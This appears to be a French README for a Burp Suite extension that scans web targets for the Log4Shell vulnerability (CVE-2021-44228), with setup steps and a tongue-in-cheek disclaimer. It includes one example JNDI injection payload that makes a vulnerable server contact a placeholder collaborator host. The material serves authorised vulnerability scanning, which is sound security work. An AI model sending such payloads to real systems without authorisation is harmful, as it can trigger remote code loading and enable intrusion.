Extension Burp pour scanner la vulnérabilité Log4Shell (CVE-2021-44228) avec des charges utiles personnalisées.
Avertissement
Je ne suis pas responsable de vos actions, du gel de burp-suite, du piratage de la cible, de la guerre thermonucléaire ou de la crise économique actuelle causée par le fait que vous suiviez ces instructions. VOUS choisissez d'utiliser cet outil, et si vous me montrez du doigt pour avoir gâché quoi que ce soit, je vais LMAO sur vous.
Instructions :
Installez l'extension à partir des versions précompilées ou compilez-la depuis les sources.
Désactivez/Décochez toutes les autres extensions de scan actif comme active scan++, burp bounty pro, param-miner, etc.
Depuis le menu supérieur, ouvrez les paramètres de Log4J Scanner.
Ajoutez votre charge utile personnalisée et enregistrez les paramètres.
Sélectionnez votre cible > clic droit > Scan.
Sélectionnez Configuration du scan > Sélectionner dans la bibliothèque
Sélectionnez uniquement Vérifications d'audit - extensions uniquement et appuyez sur le bouton OK.
Remerciements particuliers à Silent Signal, les instructions et les configurations de scan sont inspirées de son extension.
Instructions importantes à retenir :
Dans votre charge utile personnalisée, n'ajoutez PAS votre URL de collaborateur, ajoutez simplement [collaborator-server] comme espace réservé,
[collaborator-server] sera remplacé par l'URL de votre serveur collaborateur elle-même.
Exemple de charge utile : "${jndi:ldap://[collaborator-server]/a}
Ceci a été codé par moi en une journée et il s'agit d'une version initiale, des bugs peuvent survenir, les rapports de bugs, suggestions et demandes de fusion sont les bienvenus :)